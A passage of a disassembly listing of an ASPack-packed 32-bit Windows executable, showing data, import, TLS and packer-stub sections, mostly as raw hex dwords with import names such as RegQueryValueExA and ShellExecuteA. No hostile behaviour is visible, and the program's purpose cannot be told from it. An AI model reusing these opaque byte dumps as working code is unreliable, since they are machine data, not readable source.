dword_4055B0 dd 0 ; DATA XREF: sub_40136C+6D�w
; sub_4014B8+63�w ...
dword_4055B4 dd 6 dup(0) ; DATA XREF: sub_401778+11�o
; sub_401778+24�o ...
dword_4055CC dd 0 ; DATA XREF: sub_4010EC:loc_40110F�r
; sub_4010EC+2A�w ...
dword_4055D0 dd 0 ; DATA XREF: sub_4010EC+2�o
; sub_401174+A�r ...
dword_4055D4 dd 0 ; DATA XREF: sub_401290+3E�o
; sub_4012F4+51�o ...
dd 3 dup(0)
dword_4055E4 dd 4 dup(0) ; DATA XREF: sub_401538+B�o
; sub_4015C8+E�o ...
dword_4055F4 dd 0 ; DATA XREF: sub_401778+7F�o
dword_4055F8 dd 0 ; DATA XREF: sub_401D70:loc_401D80�r
align 10h
dword_405600 dd 0 ; DATA XREF: sub_401778+89�w
; sub_40191C+1�r ...
dword_405604 dd 0 ; DATA XREF: sub_401C0C�r sub_401C0C+9�r ...
dword_405608 dd 0 ; DATA XREF: sub_401C0C+26�r
; sub_401C0C+2E�r ...
dword_40560C dd 0 ; DATA XREF: sub_401778+58�w
; sub_401778+5D�r ...
dword_405610 dd 0 ; DATA XREF: sub_401778+42�o
; sub_40183C+81�o ...
align 10h
dword_405620 dd 0 ; DATA XREF: sub_402BE4+6�o
; sub_402D40+D�o ...
dword_405624 dd 12FFB4h ; DATA XREF: sub_402B9C+17�w
; sub_402BBC+2�r
off_405628 dd offset dword_403454 ; DATA XREF: sub_402C44+6�r
; sub_402CA4+14�w
dword_40562C dd 0 ; DATA XREF: sub_402C44+2C�w
; sub_402CA4+1B�w
off_405630 dd offset dword_404088 ; DATA XREF: sub_402CA4+20�w
dd 6 dup(0)
byte_40564C db 0 ; DATA XREF: sub_40327C�r
align 10h
dword_405650 dd 400000h ; DATA XREF: sub_4032C8+11�w
; sub_4032C8+16�r
dword_405654 dd 0 ; DATA XREF: CODE:0040331D�w
; CODE:0040333C�w
dword_405658 dd 0 ; DATA XREF: sub_40327C:loc_4032AB�r
dword_40565C dd 0 ; DATA XREF: CODE:00403355�w
; CODE:00403374�w
dword_405660 dd 0 ; DATA XREF: CODE:0040338D�w
; CODE:004033AC�w
dword_405664 dd 0 ; DATA XREF: CODE:004033C5�w
; CODE:004033E4�w
dword_405668 dd 0 ; DATA XREF: CODE:00403405�w
; CODE:00403424�w
align 1000h
BSS ends
; Section 4. (virtual address 00006000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00006000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 406000h
dd offset dword_4060CC
dd 2 dup(0)
dd offset dword_4060CC
dd offset dword_4060CC
dd offset dword_4060D8
align 10h
dd offset dword_4060D8
dd offset dword_4060D8
dd offset dword_4060E8
dd 2 dup(0)
dd offset dword_4060E8
dd offset dword_4060E8
dd offset dword_4060FC
dd 2 dup(0)
dd offset dword_4060FC
dd offset dword_4060FC
dd offset dword_406104
dd 2 dup(0)
dd offset dword_406104
dd offset dword_406104
dd 5 dup(0)
dword_406078 dd 77F53275h ; DATA XREF: sub_4010E4�r
dword_40607C dd 77F7E300h ; DATA XREF: sub_4010DC�r
dword_406080 dd 77F7E21Fh ; DATA XREF: sub_4010D4�r
dword_406084 dd 77E79908h ; DATA XREF: sub_4010CC�r
dword_406088 dd 77E79E34h ; DATA XREF: sub_4010C4�r
dword_40608C dd 77E7980Ah ; DATA XREF: sub_4010BC�r
dword_406090 dd 77E79A45h ; DATA XREF: sub_4010B4�r
dword_406094 dd 77E79881h ; DATA XREF: sub_4010AC�r
dword_406098 dd 77E7C486h ; DATA XREF: sub_401080�r
dword_40609C dd 77E77CC4h ; DATA XREF: sub_401078�r
dword_4060A0 dd 77E77F21h ; DATA XREF: sub_401058�r
dword_4060A4 dd 77E6177Ah ; DATA XREF: sub_401050�r
dword_4060A8 dd 77E7513Ch ; DATA XREF: sub_401048�r
dword_4060AC dd 77E7C938h ; DATA XREF: sub_401040�r
dword_4060B0 dd 77E80618h ; DATA XREF: sub_401038�r
dword_4060B4 dd 77E75CB5h ; DATA XREF: sub_401028�r
dword_4060B8 dd 77E79D8Ch ; DATA XREF: sub_401020�r
dword_4060BC dd 77EB9A84h ; DATA XREF: sub_401018�r
dword_4060C0 dd 77F6183Eh ; DATA XREF: sub_401010�r
dword_4060C4 dd 77E6D706h ; DATA XREF: sub_401008�r
dword_4060C8 dd 77E79C3Dh ; DATA XREF: sub_401000�r
dword_4060CC dd 0 ; DATA XREF: .idata:00406000�o
; .idata:0040600C�o ...
dword_4060D0 dd 77D6E1D6h ; DATA XREF: sub_402658�r
dword_4060D4 dd 77D6ADD7h ; DATA XREF: sub_401030�r
dword_4060D8 dd 0 ; DATA XREF: .idata:00406014�o
; .idata:00406020�o ...
dword_4060DC dd 77DD23D7h ; DATA XREF: sub_401070�r
dword_4060E0 dd 77DD22EAh ; DATA XREF: sub_401068�r
dword_4060E4 dd 77DD189Ah ; DATA XREF: sub_401060�r
dword_4060E8 dd 0 ; DATA XREF: .idata:00406028�o
; .idata:00406034�o ...
dword_4060EC dd 77E79B39h ; DATA XREF: sub_40321C�r
dword_4060F0 dd 77E78B61h ; DATA XREF: sub_403214�r
dword_4060F4 dd 77E79881h ; DATA XREF: sub_40320C�r
dword_4060F8 dd 77E79F93h ; DATA XREF: sub_403204�r
dword_4060FC dd 0 ; DATA XREF: .idata:0040603C�o
; .idata:00406048�o ...
dword_406100 dd 77428B97h ; DATA XREF: sub_4033EC�r
dword_406104 dd 0 ; DATA XREF: .idata:00406050�o
; .idata:0040605C�o ...
aKernel32_dll db 'kernel32.dll',0
align 4
aDeletecritical db 'DeleteCriticalSection',0
align 10h
aLeavecriticals db 'LeaveCriticalSection',0
align 4
aEntercriticals db 'EnterCriticalSection',0
align 10h
aInitializecrit db 'InitializeCriticalSection',0
align 4
aVirtualfree db 'VirtualFree',0
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 6F4C0000h, 466C6163h
dd 656572h, 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aGetversion db 'GetVersion',0
align 10h
dd 65470000h, 72754374h, 746E6572h, 65726854h, 64496461h
dd 0
aGetthreadlocal db 'GetThreadLocale',0
dd 65470000h, 61745374h, 70757472h, 6F666E49h, 41h, 4C746547h
dd 6C61636Fh, 666E4965h, 416Fh, 65470000h, 6D6F4374h, 646E616Dh
dd 656E694Ch, 41h, 65657246h, 7262694Ch, 797261h, 78450000h
dd 72507469h, 7365636Fh, 73h, 74697257h, 6C694665h, 65h
dd 61686E55h, 656C646Eh, 63784564h, 69747065h, 69466E6Fh
dd 7265746Ch, 0
aRtlunwind db 'RtlUnwind',0
align 10h
aRaiseexception db 'RaiseException',0
align 10h
dd 65470000h, 64745374h, 646E6148h, 656Ch, 72657375h, 642E3233h
dd 6C6Ch, 65470000h, 79654B74h, 72616F62h, 70795464h, 65h
dd 7373654Dh, 42656761h, 41786Fh, 61766461h, 32336970h
dd 6C6C642Eh, 0
aRegqueryvaluee db 'RegQueryValueExA',0
align 10h
aRegopenkeyexa db 'RegOpenKeyExA',0
align 10h
aRegclosekey db 'RegCloseKey',0
aKernel32_dll_0 db 'kernel32.dll',0
align 4
aTlssetvalue db 'TlsSetValue',0
dd 6C540000h, 74654773h, 756C6156h, 65h, 61636F4Ch, 6C6C416Ch
dd 636Fh, 65470000h, 646F4D74h, 48656C75h, 6C646E61h, 4165h
dd 6C656873h, 2E32336Ch, 6C6C64h, 68530000h, 456C6C65h
dd 75636578h, 416574h, 327h dup(0)
_idata ends
; Section 5. (virtual address 00007000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00007000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_tls segment para public 'DATA' use32
assume cs:_tls
;org 407000h
TlsStart dd 2 dup(0) ; DATA XREF: .rdata:00408000�o
; .aspack:TlsDirectory�o
TlsEnd dd 3FEh dup(0) ; DATA XREF: .rdata:00408004�o
; .aspack:TlsEnd_ptr�o
_tls ends
; Section 6. (virtual address 00008000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_rdata segment para public 'DATA' use32
assume cs:_rdata
;org 408000h
dd offset TlsStart
dd offset TlsEnd
dd offset TlsIndex
dd offset TlsCallbacks
TlsCallbacks dd 0 ; DATA XREF: .rdata:0040800C�o
; .aspack:TlsCallbacks_ptr�o
align 1000h
_rdata ends
; Section 9. (virtual address 0000B000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 0000B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_aspack segment para public 'DATA' use32
assume cs:_aspack
;org 40B000h
db 90h
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
public start
start proc near
pusha
call near ptr loc_40B007+3
loc_40B007: ; CODE XREF: start+1�p
jmp near ptr 459DB4F7h
start endp
; ---------------------------------------------------------------------------
dd 1E8C355h, 0EB000000h, 0FFEDBB5Dh, 0DD03FFFFh, 0B000EB81h
dd 0BD830000h, 422h, 229D8900h, 0F000004h, 36585h, 2E858D00h
dd 50000004h, 0F4D95FFh, 85890000h, 426h, 5D8DF88Bh, 0FF50535Eh
dd 0F4995h, 4D858900h, 8D000005h, 57536B5Dh, 0F4995FFh
dd 85890000h, 551h, 0FF77458Dh, 726956E0h, 6C617574h, 6F6C6C41h
dd 69560063h, 61757472h, 6572466Ch, 9D8B0065h, 531h, 0A74DB0Bh
dd 8587038Bh, 535h, 0B58D0389h, 569h, 0F003E83h, 12184h
dd 68046A00h, 1000h, 180068h, 0FF006A00h, 54D95h, 56858900h
dd 8B000001h, 0E050446h, 6A000001h, 10006804h, 6A500000h
dd 4D95FF00h, 89000005h, 15285h, 1E8B5600h, 4229D03h, 0B5FF0000h
dd 156h, 500476FFh, 56EE853h, 1B30000h, 7500FB80h, 0EC85FE5Eh
dd 8B000000h, 22BD033Eh, 0FF000004h, 0C307C637h, 78FD7FFh
dd 53565150h, 0E983C88Bh, 52B58B06h, 33000001h, 74C90BDBh
dd 0AC2C782Eh, 0A74E83Ch, 0E93C00EBh, 49430474h, 68BEBEBh
dd 3E8000EBh, 24F37500h, 18C0C100h, 689C32Bh, 8305C383h
dd 0E98304C6h, 5BCEEB05h, 0EB58595Eh, 87000008h, 85000000h
dd 8BC88B00h, 22BD033Eh, 8B000004h, 152B5h, 2F9C100h, 0C88BA5F3h
dd 0F303E183h, 685EA4h, 6A000080h, 52B5FF00h, 0FF000001h
dd 55195h, 8C68300h, 0F003E83h, 0FFFF1E85h, 800068FFh
dd 6A0000h, 156B5FFh, 95FF0000h, 551h, 5319D8Bh, 0DB0B0000h
dd 38B0874h, 5358587h, 958B0000h, 422h, 52D858Bh, 0D02B0000h
dd 0C28B7974h, 3310E8C1h, 39B58BDBh, 3000005h, 422B5h
dd 3E8300h, 4E8B6174h, 8E98304h, 3E8BE9D1h, 422BD03h, 0C6830000h
dd 1E8B6608h, 830CEBC1h, 0C7401FBh, 7402FB83h, 3FB8316h
dd 2CEB2074h, 811E8B66h, 0FFFE3h, 4016600h, 661DEB1Fh
dd 0E3811E8Bh, 0FFFh, 1F140166h, 8B660EEBh, 0FFE3811Eh
dd 100000Fh, 0EB1F14h, 0FF0E8366h, 0E202C683h, 8B9AEBB4h
dd 42295h, 41B58B00h, 0B000005h, 31174F6h, 0C00BADF2h
dd 0C2030A74h, 0AD66F88Bh, 0F1EBAB66h, 6000BEh, 22958B00h
dd 3000004h, 0C468BF2h, 840FC085h, 10Ah, 0D88BC203h, 4D95FF50h
dd 8500000Fh, 530775C0h, 0F5195FFh, 85890000h, 545h, 54985C7h
dd 0
dd 958B0000h, 422h, 0C085068Bh, 468B0375h, 3C20310h, 54985h
dd 8B188B00h, 0FA03107Eh, 549BD03h, 0DB850000h, 0A2840Fh
dd 0C3F70000h, 80000000h, 0DA030475h, 81534343h, 0FFFFFFE3h
dd 0B5FF537Fh, 545h, 0F4995FFh, 0C0850000h, 0F76F755Bh
dd 0C3h, 57197580h, 30C468Bh, 42285h, 8D535000h, 47585h
dd 0E9575000h, 98h, 0FFFFE381h, 858B7FFFh, 426h, 5458539h
dd 24750000h, 4AD38B57h, 8B02E2C1h, 5459Dh, 3C7B8B00h
dd 783B7C8Bh, 1C3B5C03h, 313048Bh, 54585h, 16EB5F00h, 0C468B57h
dd 4228503h, 53500000h, 4C6858Dh, 57500000h, 7894AEBh
dd 5498583h, 0E9040000h, 0FFFFFF32h, 46890689h, 1046890Ch
dd 8B14C683h, 42295h, 0FEEBE900h, 94B8FFFFh, 50000034h
dd 4228503h, 0B590000h, 0A88589C9h, 61000003h, 1B80875h
dd 0C2000000h, 9468000Ch, 0C3004034h, 426858Bh, 8D8D0000h
dd 43Bh, 95FF5051h, 0F49h, 5558589h, 858D0000h, 447h, 5195FF50h
dd 8900000Fh, 42A85h, 528D8D00h, 51000004h, 4995FF50h
dd 8900000Fh, 55985h, 2A858B00h, 8D000004h, 45E8Dh, 0FF505100h
dd 0F4995h, 83D0FF00h, 6A5F10C4h, 689D8D30h, 53000004h
dd 0FF006A57h, 55995h, 0FFFF6A00h, 55595h, 40000000h, 0E6000000h
dd 77h, 72656B00h, 336C656Eh, 6C642E32h, 7845006Ch, 72507469h
dd 7365636Fh, 73750073h, 32337265h, 6C6C642Eh, 73654D00h
dd 65676173h, 41786F42h, 70737700h, 746E6972h, 4C004166h
dd 4544414Fh, 52452052h, 524F52h, 20656854h, 636F7270h
dd 72756465h, 6E652065h, 20797274h, 6E696F70h, 73252074h
dd 756F6320h, 6E20646Ch, 6220746Fh, 6F6C2065h, 65746163h
dd 6E692064h, 65687420h, 6E796420h, 63696D61h, 6E696C20h
dd 696C206Bh, 72617262h, 73252079h, 65685400h, 64726F20h
dd 6C616E69h, 20752520h, 6C756F63h, 6F6E2064h, 65622074h
dd 636F6C20h, 64657461h, 206E6920h, 20656874h, 616E7964h
dd 2063696Dh, 6B6E696Ch, 62696C20h, 79726172h, 732520h
dd 248EBA52h, 0AAC9C3Bh, 321474C0h, 0D108B0D0h, 810673EAh
dd 0A7F39AF2h, 75C8FEC1h, 92E7EBF2h, 0DB87C35Ah, 400000h
dd 404084h, 0FFFFFFFFh, 9000h, 2 dup(0)
dd 773D0000h, 4, 77E7980Ah, 77E79E34h, 5 dup(0)
dd 1000h, 2600h, 4000h, 200h, 6000h, 400h, 0A0B0h, 150h
dd 34h dup(0)
dd 1024448Bh, 354EC81h, 4C8D0000h, 0E8500424h, 3A8h, 5C248C8Bh
dd 8B000003h, 3582494h, 52510000h, 0C244C8Dh, 40DE8h, 75C08400h
dd 0FFC8830Ah, 354C481h, 8BC30000h, 360248Ch, 48D0000h
dd 8D515024h, 0E80C244Ch, 5E8h, 0A75C084h, 81FFC883h, 354C4h
dd 48BC300h, 54C48124h, 0C2000003h, 1000010h, 5040302h
dd 0A080706h, 14100E0Ch, 28201C18h, 50403830h, 0A0807060h
dd 0E0C0h, 0
dd 1010000h, 2020101h, 3030202h, 4040303h, 5050404h, 505h
dd 1010000h, 3030202h, 5050404h, 7070606h, 9090808h, 0B0B0A0Ah
dd 0D0D0C0Ch, 0F0F0E0Eh, 11111010h, 3 dup(11111111h), 2 dup(12121212h)
dd 56D18B51h, 8B9h, 4A395700h, 53357204h, 0FFFFF8BEh, 8A028BFFh
dd 5C884018h, 2890C24h, 8B08428Bh, 0C10C247Ch, 0E78108E0h
dd 0FFh, 7A8BC70Bh, 89FE0304h, 0C78B0842h, 3B047A89h, 5BD273C1h
dd 8B04728Bh, 7C8B0842h, 0CE2B1024h, 18B9E8D3h, 2B000000h
dd 0FFFF25CFh, 0E8D300FFh, 895FF703h, 595E0472h, 8B0004C2h
dd 8B042444h, 89082454h, 8481h, 88918900h, 8D000000h, 81898204h
dd 8Ch, 10005h, 8C200h, 98EC81h, 55530000h, 57D18B56h
dd 0FB9h, 84AA8B00h, 33000000h, 247C8DC0h, 0F3F6332Ch
dd 24BC8BABh, 0ACh, 5489EE3Bh, 15762024h, 0C8AC933h, 8C5C8B38h
dd 8C4C8D28h, 3B404328h, 721989C5h, 17B9EBh, 74890000h
dd 72892824h, 44728904h, 68247489h, 7489FF33h, 44C71C24h
dd 11024h, 4C890000h, 6A8D1824h, 24748908h, 34448B14h
dd 3E0D32Ch, 0FF81F8h, 89010000h, 0F24247Ch, 8E87h, 34448B00h
dd 7D8928h, 33C5D8Bh, 10F983C3h, 89404589h, 7C6C3444h
dd 758B4Dh, 1024448Bh, 1C245C8Bh, 8CBA8Bh, 0EEC10000h
dd 25CE8B10h, 0FFh, 0FB03CB2Bh, 0D18BD88Ah, 7489FB8Ah
dd 0C38B1C24h, 1424748Bh, 6610E0C1h, 0E9C1C38Bh, 8BABF302h
dd 24548BCAh, 3E18320h, 7C8BAAF3h, 4C8B2424h, 448B1824h
dd 0C6831024h, 83494004h, 0F98304C5h, 24448909h, 244C8910h
dd 24748918h, 628D0F14h, 81FFFFFFh, 0FFh, 5F0F7401h, 0C0325D5Eh
dd 98C4815Bh, 0C2000000h, 828B0004h, 84h, 0C085C933h, 0B48B3B76h
dd 0AC24h, 31048A00h, 2274C084h, 88BA8Bh, 0FF250000h, 8B000000h
dd 89688444h, 0C033870Ch, 8B31048Ah, 8D68847Ch, 47688444h
dd 828B3889h, 84h, 72C83B41h, 5D5E5FCCh, 815B01B0h, 98C4h
dd 4C200h, 8B565351h, 68B57F1h, 8047883h, 88B3072h, 8841118Ah
dd 890C2454h, 8488B08h, 0C24548Bh, 8108E1C1h, 0FFE2h, 8BCA0B00h
dd 0C2830450h, 84889F8h, 5089CA8Bh, 8F98304h, 508BD073h
dd 8408B04h, 8B9h, 0D3CA2B00h, 244E8BE8h, 0FFFE0025h, 73C13B00h
dd 8C968B14h, 8B000000h, 10E9C1C8h, 1C8ADB33h, 0EBD38B11h
dd 2C463B3Bh, 463B0A73h, 83D21B28h, 2CEB0AC2h, 7330463Bh
dd 0BBA07h, 20EB0000h, 7334463Bh, 0CBA07h, 14EB0000h, 7338463Bh
dd 0DBA07h, 8EB0000h, 1B3C463Bh, 0FC283D2h, 798B0E8Bh
dd 89FA0304h, 1C8B0479h, 18B996h, 0C32B0000h, 0D35FCA2Bh
dd 964C8BE8h, 8BC10344h, 888Eh, 8B5B5E00h, 0C3598104h
dd 8B575653h, 33D233F9h, 68B78DC0h, 89000002h, 57E85616h
dd 8A000002h, 403A308Ch, 0BB5E0044h, 1, 0D304C683h, 40D303E3h
dd 723AF883h, 24448BDEh, 104F8D10h, 2D16850h, 48E80000h
dd 50FFFFFDh, 8F8D1C6Ah, 0A0h, 0FFFD3AE8h, 86A50FFh, 1308F8Dh
dd 2CE80000h, 50FFFFFDh, 8F8D136Ah, 1C0h, 0FFFD1EE8h, 608789FFh
dd 5F000002h, 2F5055Eh, 0C25B0000h, 448B0004h, 0D18B0824h
dd 4244C8Bh, 8D028957h, 8890442h, 200440C7h, 89000000h
dd 82891042h, 0A0h, 1308289h, 82890000h, 1C0h, 0BDB9C033h
dd 89000000h, 25082h, 54828900h, 89000002h, 25882h, 60BA8B00h
dd 89000002h, 25C82h, 8BABF300h, 4E8AACAh, 5F000000h, 810008C2h
dd 30CECh, 0D98B5300h, 6B8D5655h, 16A5704h, 29E8CD8Bh
dd 85FFFFFCh, 8B0E75C0h, 260BBh, 0BDB900h, 0ABF30000h
dd 6AF633AAh, 0E8CD8B04h, 0FFFFFC0Ch, 10344488h, 13FE8346h
dd 0BB8DED72h, 1C0h, 1024448Dh, 0E8CF8B50h, 0FFFFFC80h
dd 0B75C084h, 5B5D5E5Fh, 30CC481h, 33C30000h, 0E8CF8BF6h
dd 0FFFFFDE4h, 7310F883h, 608B8B15h, 8A000002h, 0D0023114h
dd 880FE280h, 46243454h, 287560EBh, 0CD8B026Ah, 0FFFBB3E8h
dd 3C083FFh, 4E7EC085h, 2F5FE81h, 527D0000h, 23344C8Ah
dd 344C8848h, 0C0854624h, 36EBEA7Fh, 7511F883h, 8B036A0Eh
dd 0FB86E8CDh, 0C083FFFFh, 6A0CEB03h, 0E8CD8B07h, 0FFFFFB78h
dd 850BC083h, 81137EC0h, 2F5FEh, 0C6177D00h, 243444h, 0C0854846h
dd 0FE81ED7Fh, 2F5h, 0FF738C0Fh, 548DFFFFh, 4B8D2424h
dd 0D5E85210h, 84FFFFFBh, 5F0B75C0h, 815B5D5Eh, 30CC4h
dd 848DC300h, 2F524h, 0A08B8D00h, 50000000h, 0FFFBB3E8h
dd 75C084FFh, 5D5E5F0Bh, 0CC4815Bh, 0C3000003h, 11248C8Dh
dd 51000003h, 1308B8Dh, 91E80000h, 84FFFFFBh, 5F0B75C0h
dd 815B5D5Eh, 30CC4h, 83C6C300h, 264h, 80C03300h, 31104BCh
dd 75030000h, 0F8834008h, 0EBF07208h, 6483C607h, 1000002h
dd 260BB8Bh, 748D0000h, 0F5B92424h, 0F3000002h, 5D5E5FA4h
dd 815B01B0h, 30CC4h, 1E8C300h, 90000000h, 0C7EE815Eh
dd 0C3004445h, 8B14EC83h, 531C2444h, 0C75655h, 0
dd 2424448Bh, 85FF3357h, 89F18BC0h, 0F10247Ch, 25B86h
dd 104E8D00h, 0FFFC83E8h, 1003DFFh, 13730000h, 1880E8Bh
dd 47410E8Bh, 7C890E89h, 29E91024h, 3D000002h, 2D0h, 213830Fh
dd 50000h, 8BFFFFFFh, 7E083E8h, 8D03EDC1h, 0F8830250h
dd 24548907h, 94850F14h, 8D000000h, 0A08Eh, 0FC36E800h
dd 4E8BFFFFh, 56DB3308h, 0FFFF6DE8h, 309C8AFFh, 44401Eh
dd 8F9835Eh, 4E8B3272h, 41118A04h, 18245488h, 8B044E89h
dd 548B0C4Eh, 0E1C11824h, 0FFE28108h, 0B000000h, 8568BCAh
dd 89F8C283h, 0CA8B0C4Eh, 83085689h, 0CE7308F9h, 8B087E8Bh
dd 8B90C56h, 2B000000h, 0D3FB03CFh, 18B9EAh, 7E890000h
dd 81CB2B08h, 0FFFFFFE2h, 33EAD300h, 3E856C9h, 8AFFFFFFh
dd 4002308Ch, 8B5E0044h, 3142444h, 89C103CAh, 8A142444h
dd 26486h, 0AE9C8B00h, 268h, 0E856D233h, 0FFFFFEDAh, 3A35948Ah
dd 5E004440h, 0FA8BC084h, 0FF837674h, 8B717203h, 6F8D0846h
dd 8F883FDh, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B1C24h, 4468908h, 1C24448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 7E8B0846h
dd 8B90Ch, 0C82B0000h, 0EFD3C503h, 18B9h, 8468900h, 0E781CD2Bh
dd 0FFFFFFh, 8E8DEFD3h, 130h, 0FFFB1BE8h, 8DC303FFh, 5BEBF81Ch
dd 8087E83h, 468B3172h, 0C568B04h, 8A08E2C1h, 4C884008h
dd 4E8B2024h, 4468908h, 2024448Bh, 0FF25h, 0F8C18300h
dd 0C18BD00Bh, 8908F883h, 4E890C56h, 8BCF7308h, 468B0856h
dd 8B90Ch, 0CA2B0000h, 0E8D3D703h, 18B9h, 8568900h, 0FF25CF2Bh
dd 0D300FFFFh, 83D803E8h, 1A7303FBh, 509E8C8Bh, 85000002h
dd 8B3074DBh, 25096h, 9E948900h, 250h, 868B1BEBh, 254h
dd 250968Bh, 4B8D0000h, 588689FDh, 89000002h, 25496h, 508E8900h
dd 8B000002h, 247C8B06h, 148D4114h, 89C23B38h, 8B107316h
dd 40D12BD0h, 5088128Ah, 3B168BFFh, 8BF072C2h, 3102444h
dd 244489C7h, 0EBF88B10h, 0E8CE8B0Bh, 0FFFFFBF7h, 1C74C084h
dd 28247C3Bh, 0FDAB820Fh, 448BFFFFh, 38892C24h, 0B05D5E5Fh
dd 0C4835B01h, 8C214h, 325D5E5Fh, 0C4835BC0h, 8C214h
TlsDirectory dd offset TlsStart
TlsEnd_ptr dd offset TlsEnd
TlsIndex_ptr dd offset TlsIndex
TlsCallbacks_ptr dd offset TlsCallbacks
TlsSizeOfZeroFill dd 0
TlsCharacteristics dd 0
align 8
dd 8, 77E7A5FDh, 77E79F93h, 77E805D8h, 0
aKernel32_dll_1 db 'kernel32.dll',0
db 2 dup(0), 47h
aEtprocaddress db 'etProcAddress',0
align 4
aGetmodulehandl db 'GetModuleHandleA',0
db 2 dup(0), 4Ch
aOadlibrarya db 'oadLibraryA',0
dd 3 dup(0)
dd 0BF6Ch, 0BF5Ch, 3 dup(0)
dd 0C010h, 0C034h, 3 dup(0)
dd 0C01Bh, 0C03Ch, 3 dup(0)
dd 0C028h, 0C044h, 5 dup(0)
aUser32_dll db 'user32.dll',0
aAdvapi32_dll db 'advapi32.dll',0
aShell32_dll db 'shell32.dll',0
aSW db 'w',0
align 4
aW db '#w',0
align 4
aClbw db 'Bw',0
align 4
dd 65470000h, 79654B74h, 72616F62h, 70795464h, 65h, 51676552h
dd 79726575h, 756C6156h, 41784565h, 53000000h, 6C6C6568h
dd 63657845h, 41657475h, 3E0h dup(0)
_aspack ends
; Section 10. (virtual address 0000D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 0000D000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_adata segment para public 'DATA' use32
assume cs:_adata
;org 40D000h
align 2000h
_adata ends
; Section 11. (virtual address 0000E000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0000E000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 40E000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start